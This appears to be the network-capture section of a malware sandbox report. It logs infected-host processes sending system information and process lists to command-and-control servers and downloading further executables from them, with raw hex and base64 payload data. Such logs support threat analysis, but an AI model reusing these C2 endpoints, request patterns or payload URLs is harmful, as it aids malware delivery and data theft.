Dec 16, 2024 11:03:28.591084003 CET	1236	IN	Data Raw: 6a 20 6d 15 d3 4c 39 a6 38 ed a8 9d 5c c4 6d 71 d4 16 8f a1 25 65 a7 6c b8 18 86 b7 1c 91 95 9a 1d 2b 5b ac 59 a7 c6 e0 51 ef ac c8 3a 4c 52 84 42 58 90 d0 f1 46 90 8b 19 fa 8c f8 b2 b3 8e 1b 41 a1 86 06 25 50 77 79 3a ca 88 36 c6 86 9f 33 4f 70 Data Ascii: j mL98\mq%el+[YQ:LRBXFA%Pwy:63Opli^TLV(lNpKqBPmv0H$}v!Pvg7/96am48`l6]w[[>2lX[W}@h@Y{x7eRF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49843	141.8.192.141	80	4476	C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:31.115789890 CET	12360	OUT	POST /kNcZsqQOSglxukmuLodY1734167391 HTTP/1.1 Host: home.twentygr20sb.top Accept: / Content-Type: application/json Content-Length: 457300 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 33 34 33 34 30 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "1734343408", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 16, 2024 11:03:31.235801935 CET	4944	OUT	Data Raw: 4f 6b 44 58 42 74 37 65 33 69 69 5c 2f 4a 50 47 58 78 62 79 37 77 61 34 58 77 50 45 2b 5a 35 52 6a 63 35 6f 59 5c 2f 50 73 4c 6b 4e 50 43 34 43 74 51 6f 56 59 56 73 56 6c 2b 61 5a 69 71 38 36 6d 49 76 44 32 55 4b 65 56 31 59 4f 4d 55 35 75 64 53 Data Ascii: OkDXBt7e3ii\/JPGXxby7wa4XwPE+Z5Rjc5oY\/PsLkNPC4CtQoVYVsVl+aZiq86mIvD2UKeV1YOMU5udSna0VJr9y8BPBLNvHvjDMeD8ozzL8hxGWcN4ziWrjMyoYnE0Z4fB5nk+Vyw1Onhff9tOrnFGpGUnGCp0al3zOKf4HUV\/Yz\/w6u\/YL\/wCiED\/w53xk\/wDnh0f8Orv2C\/8AohA\/8Od8ZP8A54dfzR\/xPjwn
Dec 16, 2024 11:03:31.235901117 CET	4944	OUT	Data Raw: 4b 4e 6b 41 56 62 33 52 64 57 38 53 2b 56 49 34 33 57 62 37 47 55 39 35 38 4d 5c 2f 69 58 70 5c 2f 77 41 58 76 67 70 59 65 50 74 4f 74 35 37 53 50 57 74 44 75 52 65 57 30 30 45 38 4d 64 74 71 39 6c 45 62 4c 57 37 53 30 6b 6e 56 54 65 57 64 6e 71 Data Ascii: KNkAVb3RdW8S+VI43Wb7GU958M\/iXp\/wAXvgpYePtOt57SPWtDuReW00E8Mdtq9lEbLW7S0knVTeWdnq0F5ZwXse6O4FuWBDh0X5pr8izDOuJMqnWynF1VhsZg61bC4rnw1H63RxGGm6NajJ8rw1oTjJaYbn5k2qjVkfs2XcOcI5vTw2d4KhLF4HMMPQxmDjHGYj6hWw2JpRr0K0I80cZzThOLXNjHT5XZ0ea8jv8AX\/i5F4
Dec 16, 2024 11:03:31.236004114 CET	4944	OUT	Data Raw: 31 36 55 48 59 52 6c 76 34 33 68 77 63 66 76 5a 50 4e 36 33 48 35 35 5c 2f 50 5c 2f 43 6d 65 57 5c 2f 6d 4f 2b 4e 73 30 66 38 41 42 4a 46 35 48 36 56 4d 78 64 74 5c 2f 37 6e 5c 2f 72 72 48 5c 2f 79 77 5c 2f 7a 5c 2f 41 4a 34 70 6b 6e 79 5c 2f 50 Data Ascii: 16UHYRlv43hwcfvZPN63H55\/P\/CmeW\/mO+Ns0f8ABJF5H6VMxdt\/7n\/rrH\/yw\/z\/AJ4pkny\/P9\/p+8kl\/f54OP8ACgCtJHmR\/kj\/AOmX739P89KhfZt+eTLx\/vYv+W\/1FpzVzb5nzodhP\/TL8\/pUPl\/N\/wAs08z0yfT\/AD\/9atKfX5fqdVOp8rfh\/wADfpqQs3mSPvTZbSf89P8AX49un+fpmoVk8
Dec 16, 2024 11:03:31.236088037 CET	4944	OUT	Data Raw: 53 76 56 6a 5c 2f 65 58 30 4e 70 5a 78 78 58 6d 75 4b 34 4d 34 52 71 59 4c 41 63 55 35 4c 6b 6d 66 63 54 52 7a 4c 4f 6f 7a 6a 6c 75 48 77 4e 58 47 5a 58 6b 73 36 75 41 72 59 57 6c 6a 73 54 44 4f 61 4e 58 50 4b 4e 54 43 53 71 59 42 55 61 43 70 31 Data Ascii: SvVj\/eX0NpZxxXmuK4M4RqYLAcU5LkmfcTRzLOozjluHwNXGZXks6uArYWljsTDOaNXPKNTCSqYBUaCp1MTDERxFKhGX4\/8A7aX7ZPwe\/bJ+Bn7OuueKfDfj\/TP21PhX4bh+HPxO8dLo3huT4dfFXwNpj36aLq2oa9\/wl7+Kj4xtGjs9ZcP4Ot7BtT8TeL7L7U9hb6C8P67\/APBHD4bfH\/4o\/wDBOzx14f8A2cf2lf8
Dec 16, 2024 11:03:31.236195087 CET	4944	OUT	Data Raw: 70 65 46 74 4e 38 55 32 33 78 4c 2b 45 33 77 78 73 74 55 30 5c 2f 58 45 38 44 65 4b 37 53 30 31 33 77 4c 71 58 6a 48 52 49 74 52 30 61 61 79 76 62 2b 31 65 36 30 35 72 33 34 6a 50 38 41 6a 6a 68 50 68 62 4d 4d 70 79 76 69 44 50 4d 48 6c 57 50 7a Data Ascii: peFtN8U23xL+E3wxstU0\/XE8DeK7S013wLqXjHRItR0aayvb+1e605r34jP8AjjhPhbMMpyviDPMHlWPz2Uo5Vh8V7VPF8uMy\/LnJVIUp0qMP7QzXLMCqmIqUqcsXj8Hh4ydXEUoS\/wAxOGfDfjvjLKs7zvhfhvHZzlfDlOVXOcXhPYuOCjDBYvMZp06lanWr1IZfl+Ox06WFp1qsMJg8TiJQVKhUnHJVv7+fy5\/lXS6F4u
Dec 16, 2024 11:03:31.355958939 CET	2472	OUT	Data Raw: 6c 39 4f 72 55 79 75 6a 56 7a 62 4d 4d 79 71 56 49 35 78 68 75 49 63 6b 6d 36 65 57 55 63 47 38 52 69 70 79 6f 5a 62 78 46 42 30 34 55 35 79 77 38 63 73 78 75 4b 71 77 70 30 38 48 4f 72 44 34 58 78 45 38 52 5c 2f 70 67 2b 4b 50 42 32 64 63 44 38 Data Ascii: l9OrUyujVzbMMyqVI5xhuIckm6eWUcG8RipyoZbxFB04U5yw8csxuKqwp08HOrD4XxE8R\/pg+KPB2dcD8W8KYaPDWbvB\/2tWpZHlWUU6ccoxnDnEOGdXOK+PjhcFTeJx3DkoVKlanHFzzHCYKjOpWxcaMrVFZmjanHrOl2OqRRPDHfQLOkUhDOgYkbWK\/KTx24rTr+yadSFWnCrTfNTqQjUhJXtKE0pRkr2eqaeqTP4NdOpR
Dec 16, 2024 11:03:31.355989933 CET	2472	OUT	Data Raw: 37 65 33 31 72 6e 4f 67 71 76 76 38 74 39 69 62 5c 2f 33 76 58 5c 2f 6e 74 5c 2f 38 41 58 5c 2f 44 6e 74 7a 54 50 75 74 38 73 65 7a 39 37 35 76 38 41 72 66 54 50 62 33 5c 2f 43 72 50 33 63 48 2b 50 5c 2f 41 46 57 65 33 2b 66 65 71 7a 52 2b 62 38 Data Ascii: 7e31rnOgqvv8t9ib\/3vX\/nt\/8AX\/DntzTPut8sez975v8ArfTPb3\/CrP3cH+P\/AFWe3+feqzR+b8iP8nm\/6zr+H60GlPr8v1IY9jRvD9\/\/AJ5faP8APp29Peju58zd\/wBNP8j\/ABx+lTSb1j+dN\/8Azyj9xnt\/n60z5\/Lm2SfJm3\/67w9vw\/rQaEMkaNsdx5SeV5XT9\/Fcf8\/fX\/D3NQ+YY40fZx5X+r
Dec 16, 2024 11:03:31.356193066 CET	4944	OUT	Data Raw: 5c 2f 47 4d 64 39 45 58 45 35 62 77 39 48 49 2b 47 2b 4c 73 31 78 46 58 47 55 73 73 79 6a 46 5a 6c 6a 38 52 51 6f 34 7a 4c 4d 70 6a 6d 47 4e 78 4f 64 34 76 4c 36 39 44 44 30 63 52 54 78 6d 59 34 48 4e 4d 79 79 75 46 44 42 31 63 4a 67 36 56 48 45 Data Ascii: \/GMd9EXE5bw9HI+G+Ls1xFXGUssyjFZlj8RQo4zLMpjmGNxOd4vL69DD0cRTxmY4HNMyyuFDB1cJg6VHEwxMsPWxVKpUxP8AQOA+nXhc64jqZ7xdwNkeFoYKedZ1hsry7BVsRgc6zuvlWBwOR4TNMJicTXwksDluLyrK8xVavQr16GIwk5ZdUwDxEuXjvBfxz1W0vP2KPFOo\/tTv4F\/Z4+Cfjr9g7W\/id+xRLof7Q1prHw\
Dec 16, 2024 11:03:31.356237888 CET	4944	OUT	Data Raw: 66 68 37 6b 4d 38 74 79 65 68 6c 75 48 77 47 43 6e 6a 4d 30 39 6d 6f 35 58 5c 2f 71 35 55 77 5c 2f 74 4a 72 47 5c 2f 57 58 47 57 4b 34 57 79 72 45 56 71 63 63 51 6f 56 5a 66 58 66 61 4b 66 39 6f 59 7a 32 33 78 35 34 54 38 56 66 44 5c 2f 53 64 48 Data Ascii: fh7kM8tyehluHwGCnjM09mo5X\/q5Uw\/tJrG\/WXGWK4WyrEVqccQoVZfXfaKf9oYz23x54T8VfD\/SdH8D\/tIN8TNNPxb8I\/8ABNpv2VoP2Ubr4cfF+2+Kd18eNJ\/ZH1L9i3Q7yPxdB4Mv\/gZefBq80mW0+MuoeL5Pi9pHjuPSheeELf4Yf2\/HA0+74L034NeMLTQ\/jr8RviX4O+HfxS0\/9nX4LfCj4o\/An4peBPj
Dec 16, 2024 11:03:31.398499012 CET	27192	OUT	Data Raw: 66 38 41 6a 31 5c 2f 6d 41 65 4b 50 5a 65 55 76 75 5c 2f 34 42 70 54 36 5c 2f 4c 39 53 49 4f 6b 69 5c 2f 49 6c 75 5c 2f 6c 5c 2f 76 66 4d 5c 2f 7a 5c 2f 41 4a 2b 75 4d 30 6e 7a 2b 58 73 32 62 50 4c 69 45 6b 76 6d 66 75 50 4a 34 36 55 2b 58 59 30 Data Ascii: f8Aj1\/mAeKPZeUvu\/4BpT6\/L9SIOki\/Ilu\/l\/vfM\/z\/AJ+uM0nz+Xs2bPLiEkvmfuPJ46U+XY0myFP3Yi\/ffvf+Xf8A59f8+nrTF6OjpJvk\/df63EH5\/wCHY9qxND928f7B\/M\/4UY\/2D+Z\/wqWiuc\/yPIsf7B\/M\/wCFMqxRQBXoqSTt+P8ASo6DSn1+X6hRRRQaBUG4+p\/Op6YnT8f6CgCKil2f7Y\/M
Dec 16, 2024 11:03:34.274156094 CET	164	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Mon, 16 Dec 2024 10:03:34 GMT content-type: text/html; charset=utf-8 content-length: 26 Data Raw: 46 5a 71 59 67 6a 72 66 4e 6c 42 61 7a 33 6b 4e 31 37 33 34 33 34 33 34 31 33 Data Ascii: FZqYgjrfNlBaz3kN1734343413

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49851	141.8.192.141	80	4476	C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:34.608336926 CET	126	OUT	GET /kNcZsqQOSglxukmuLodY1734167391?argument=FZqYgjrfNlBaz3kN1734343413 HTTP/1.1 Host: home.twentygr20sb.top Accept: /
Dec 16, 2024 11:03:36.084795952 CET	1236	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Mon, 16 Dec 2024 10:03:35 GMT content-type: application/octet-stream content-length: 10816560 content-disposition: attachment; filename="80105954plxpiybkpwdJdT;" last-modified: Sat, 14 Dec 2024 09:09:51 GMT cache-control: no-cache etag: "1734167391.1691985-10816560-483596862" Data Raw: e8 47 b8 68 6a 70 6c 2a 74 aa a9 3f 20 d1 d1 58 57 cd 30 27 da 61 e1 d5 00 4f c4 71 82 0e 1b 97 a1 07 c1 ac 1e dd 9f 6a 28 48 22 4d de e8 a4 66 69 06 e2 dd e9 6c fc d4 5b 6c 7a 2d 2a fa 2b bf 46 3e c1 81 58 32 38 ee cd b1 c5 e7 c8 75 62 e3 c6 25 0e 66 a1 30 62 cc 35 27 d8 1b 33 0b 5a 74 76 b3 8c 08 50 80 ee 4c af 3a 54 2f 5b cb 3c 99 10 fa cd c0 d1 da 84 33 70 a9 1a c6 1c e0 50 6f 76 78 ba c7 94 a6 a6 7d f0 95 9e 52 02 03 77 0f 17 4e 49 02 ec 77 4c 79 73 14 5e db 83 97 11 bf 74 f4 03 24 89 7e 91 e0 c2 ea 71 ae 28 6c 8e 63 79 a0 52 e1 c2 ae c2 b4 72 9f 9c 7e 2e 90 42 fe 1f 91 99 a5 f6 b3 7e 0b 34 f0 c6 83 62 b9 49 e6 6b 83 fb 28 d1 1e 64 ea b7 72 63 87 90 c1 5a fd 8b 88 cb 0b 0e 2b 96 83 9f a4 f4 be a4 15 ed 42 34 6b 52 64 c1 31 93 ae ee fc d4 70 10 10 be ef 86 1a 9d f7 15 a3 c2 e3 dc 08 f6 ac 5d 40 31 5f af ed 6d b1 71 d2 e8 c0 5c 4f 70 20 3f ac bc f1 50 9d 88 5a ce 4b 75 57 6f e6 9b 28 ce 19 71 bb 48 a7 e6 44 f7 4a 6c 5c 15 09 b6 48 e3 be db 2a 96 7e eb f0 66 45 d2 72 ee f4 fb 87 a9 49 13 23 0e 88 [TRUNCATED] Data Ascii: Ghjplt? XW0'aOqj(H"Mfil[lz-+F>X28ub%f0b5'3ZtvPL:T/[<3pPovx}RwNIwLys^t$~q(lcyRr~.B~4bIk(drcZ+B4kRd1p]@1_mq\Op ?PZKuWo(qHDJl\H~fErI#5~[V7;MGKHPt=kc}G5cid}"lj({6@S5`XKc)7;vD:8/2/60vm9`]5!m8]Hb.]y0^]U(z2,o>oe}<n:rhI@^\$@qmvst8#eRvk\~1F#w"aR=f@0hXy8`uYn}v$>Z/S#h2[Dtlxi(s;F+UmiaA)7wm8FYxH9\~B?(&y$*!@7}]C.)MI)IlRF7h!M9{N`SkS6'\|]nJ3N+7]cb^]GXXfk
Dec 16, 2024 11:03:36.084821939 CET	1236	IN	Data Raw: 21 63 d3 73 4b 65 7b 89 e1 8b 64 37 ff fb 37 76 7e 4f 0b 52 fe 11 9f 8e e1 95 02 c1 dc d0 0e 22 bf 13 b4 38 80 e2 d0 51 30 72 23 2c b7 4f 7c bb f7 c0 9b 4a f4 97 5e 41 17 21 4c f7 4b b3 73 54 1e c0 5a dd 17 2f 49 58 9a a8 5b 2f d3 25 ae 2d 3a de Data Ascii: !csKe{d77v~OR"8Q0r#,O\|J^A!LKsTZ/IX[/%-:Lg`F7 [i/AM]Qo\|;MyYQg?CtVk''S%v)dvG3_\(O6gCav_9?8t<I~)GVasyNj_gG
Dec 16, 2024 11:03:36.084836960 CET	1236	IN	Data Raw: 38 93 90 9e 02 7f 2d 3c cf f3 e1 92 82 68 4e a6 45 3a 75 11 9e cc 28 17 84 42 c1 79 18 3e f3 46 11 ce 2f 4d d5 8b 96 61 f1 0b e2 3b 91 37 4d 4d d5 c7 3c 63 88 52 82 ac f1 e6 02 cd 67 f4 59 b2 c7 77 21 6d bb 1c 93 16 cc 4e c3 47 81 02 81 a2 33 4e Data Ascii: 8-<hNE:u(By>F/Ma;7MM<cRgYw!mNG3Nt44:20htMygcj{3S:Y7<.xL&y{Q-9XK;y}Sjc9&MxOeT7?D[\|4ce"OIO[,Vr23<
Dec 16, 2024 11:03:36.084933043 CET	1236	IN	Data Raw: 49 ba e7 ac a5 d6 ee 8a 89 e2 44 4f fb aa d2 d8 ce 19 b1 6b 6d 91 56 82 1f 10 b8 b5 f2 09 77 6e 3c 8a bc fd 4e 06 dc 27 3a c4 6f df 29 98 a2 d3 60 f2 a9 d2 14 54 2f b4 55 78 c0 42 1c fa 7a db ba 73 20 57 08 61 08 d1 3d ab 7e 04 0e f8 fb 96 49 a1 Data Ascii: IDOkmVwn<N':o)`T/UxBzs Wa=~IqL%yoZCAN~aSj0Zer-/#<ruLPg6V!'t6p7]7Fk&pyPp
Dec 16, 2024 11:03:36.084955931 CET	896	IN	Data Raw: 79 34 dc 1d 5d 9e e6 8e a2 e6 ac 77 64 71 d4 01 bc d0 48 98 18 5d ac 50 87 6d 2d de 76 d0 f0 e6 a4 25 79 ad bf 4e d2 bd 0a 65 e6 41 08 24 9f 1f 50 c4 ef 87 d6 83 5c 39 c3 2c ec 65 0b f4 11 2e 55 40 16 7c 44 31 0e 93 28 4d e7 57 23 08 a6 6d 78 dc Data Ascii: y4]wdqH]Pm-v%yNeA$P\9,e.U@\|D1(MW#mxNItVG36ENs"e`sh\v4KqTY)b9Nib6b*tG<Nuw+4,(D\/:I:?)gCH2Fod"c+{
Dec 16, 2024 11:03:36.084970951 CET	1236	IN	Data Raw: 14 31 44 fb fc 72 0b 28 80 a5 5b ea a7 98 38 a9 63 dd f3 79 b5 2f 6e 2b 95 95 9e 1e b4 da 96 b4 4f 2d 16 3f 42 2b 23 4a cc f2 54 ba 03 82 e0 aa d9 7b d1 eb e7 7b ee 1b 94 34 04 4e dd 1b 04 14 69 7a b3 9c 7f cc 8d 5a 87 3f b9 41 33 9f 18 ed b4 83 Data Ascii: 1Dr([8cy/n+O-?B+#JT{{4NizZ?A39V r Sr~,;l<V_}jia"Aq=4h"Rg?1]e\| !AwR%&OWcEYmd#$'9t[\|U02$->'<>Ze]
Dec 16, 2024 11:03:36.084984064 CET	1236	IN	Data Raw: f7 4f ea 5b 08 49 2d 91 aa 91 33 29 5d 31 0b 1d 4f ce 1b a9 05 65 0b 35 d8 50 35 e2 08 d0 55 ef 22 73 f5 89 cb d9 a0 e9 33 63 8a cb 5d 04 de b4 75 3b 9d 71 29 3c 6a 53 5a 51 e5 bd 8f 86 5a 5c 99 a3 ea bf db 16 89 6d 0b dd e2 6f b9 02 4b a9 fc 2c Data Ascii: O[I-3)]1Oe5P5U"s3c]u;q)<jSZQZ\moK,u'rU1\|)hW'/&J#]Z@;`Lvx~P}f{:uS@l^iK;Ka\|+PGGi9==d-t]bp>WosT?EYaP
Dec 16, 2024 11:03:36.084997892 CET	1236	IN	Data Raw: f3 d0 82 8a 7d 79 eb 40 72 9b 59 da 36 1c e0 43 eb bd 3f d7 1b 96 c4 cc 8e ac 6b b7 9f bd 23 59 e4 ca 04 d6 0e 8c 55 16 b5 19 72 79 97 2a b9 8b 80 6b 2c 8e 2d 80 8f 57 9c 4b 83 49 c9 20 41 7a 9a 03 2a ed 93 b7 cd 1f 8c 2e 90 48 d8 b5 dc 3c 7c 36 Data Ascii: }y@rY6C?k#YUryk,-WKI Az.H<\|6\|{+<}\|Xr3"[Z7k( Tj$utE.s,9qedc%=AG1_C=.S(36sJ5l
Dec 16, 2024 11:03:36.085314035 CET	1236	IN	Data Raw: a8 e1 82 bd 62 c5 b0 fe 21 c0 a9 77 1f f6 0c 2d 79 dd 78 40 71 f1 12 66 56 98 fd e5 e6 16 e4 c2 73 74 37 9e 9b f5 b2 ee 3b e6 9b ed f3 b7 78 59 57 f7 21 80 4f dd 97 50 52 10 59 5e bd 21 11 ac 46 14 39 a8 47 4d 42 18 98 8a 01 dd 55 55 17 0c c0 ea Data Ascii: b!w-yx@qfVst7;xYW!OPRY^!F9GMBUUZQNQL%+a0bD!zrz\|I41d;f!7{J~rJr'L/>\|%h/NzH?\u%.v
Dec 16, 2024 11:03:36.085330963 CET	896	IN	Data Raw: b5 bf 68 b8 22 b7 a4 84 76 4e 5a 02 ad 4d 65 ee 65 e4 86 8d 38 a7 66 9b 83 65 2c ba 45 18 4f 81 f2 02 ab 6c 6d b1 67 3f 43 14 90 dd e4 e9 36 24 d8 e4 cc 9a 50 07 ea 83 3a 1d 49 4f 0d ac 17 33 37 cc 72 db 0f ed 31 f5 0a 23 a3 c0 27 89 48 68 d2 c5 Data Ascii: h"vNZMee8fe,EOlmg?C6$P:IO37r1#'Hh\1sFjZUaNH5(*}Z<8h2dNY3+3=ta4SLo;Z#An:& [fa\D{s1=@fKu`,yXW2v\|b Ooj2
Dec 16, 2024 11:03:36.204916000 CET	1236	IN	Data Raw: 6d 0d 0a f6 ac ff 65 05 4b e8 69 82 a7 1d 7a 6c f5 7d fa a6 8d a6 71 9c 26 a1 f5 f4 82 27 d7 ae ce f1 85 8f 67 d0 72 a0 3c 40 7d 48 f9 1c e4 7f 87 e7 33 37 98 cd e4 13 b8 5b a8 46 5b 2d f9 7d ed 64 3d 22 3f 4d 8d d6 1e 9a 35 df f8 65 46 f7 cd b5 Data Ascii: meKizl}q&'gr<@}H37[F[-}d="?M5eFrMZ`M-kvk[`P}k[u>Ic?)zKb]9'Gf3NB'\[L)lPZ?\wy+1?]cH+^4pL`>b++Hg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49861	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:38.211088896 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 30 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016042001&unit=246122658369
Dec 16, 2024 11:03:39.474796057 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49864	31.41.244.11	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:39.600055933 CET	61	OUT	GET /files/encoxx/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 16, 2024 11:03:40.925728083 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:40 GMT Content-Type: application/octet-stream Content-Length: 393728 Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT Connection: keep-alive ETag: "675a96d4-60200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'FFFFFFFFFFFFRichFPELfebQ@$8gd0:-@.textab `.data`f@.rsrcz0<@@
Dec 16, 2024 11:03:40.925834894 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 6d 05 00 00 00 00 00 88 69 05 00 9c 69 05 00 b4 69 05 00 c8 69 05 00 e2 69 05 Data Ascii: miiiiijj*jDjXjnjjjjjjjjk k6kRkhkpikkkkkkkll(l>lRlblvlll
Dec 16, 2024 11:03:40.926127911 CET	1236	IN	Data Raw: 6c 05 00 bc 6c 05 00 cc 6c 05 00 e2 6c 05 00 f6 6c 05 00 78 6b 05 00 5c 69 05 00 90 71 05 00 80 6d 05 00 9c 6d 05 00 ba 6d 05 00 cc 6d 05 00 d8 6d 05 00 f0 6d 05 00 08 6e 05 00 1a 6e 05 00 2a 6e 05 00 38 6e 05 00 4a 6e 05 00 62 6e 05 00 76 6e 05 Data Ascii: lllllxk\iqmmmmmmnnn8nJnbnvnnnnnnnnnoo8oJoXodonoooooooopp&p2p<pHpZpppppppppqqq<q
Dec 16, 2024 11:03:40.926184893 CET	1236	IN	Data Raw: 6e 64 69 63 61 74 65 73 20 61 20 62 75 67 20 69 6e 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 0d 0a 00 00 52 36 30 33 30 0d 0a 2d 20 43 52 54 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 64 0d 0a 00 00 52 36 30 32 38 0d 0a 2d 20 75 6e Data Ascii: ndicates a bug in your application.R6030- CRT not initializedR6028- unable to initialize heapR6027- not enough space for lowio initializationR6026- not enough space for stdio initializationR6025- pure virtua
Dec 16, 2024 11:03:40.926219940 CET	1236	IN	Data Raw: 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b Data Ascii: *+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~=EEE00P('8PW700PP (`h`hhhxppwppGetProcessWindowStationGetUserObjectInformationAGetL
Dec 16, 2024 11:03:40.926256895 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: h(((( H
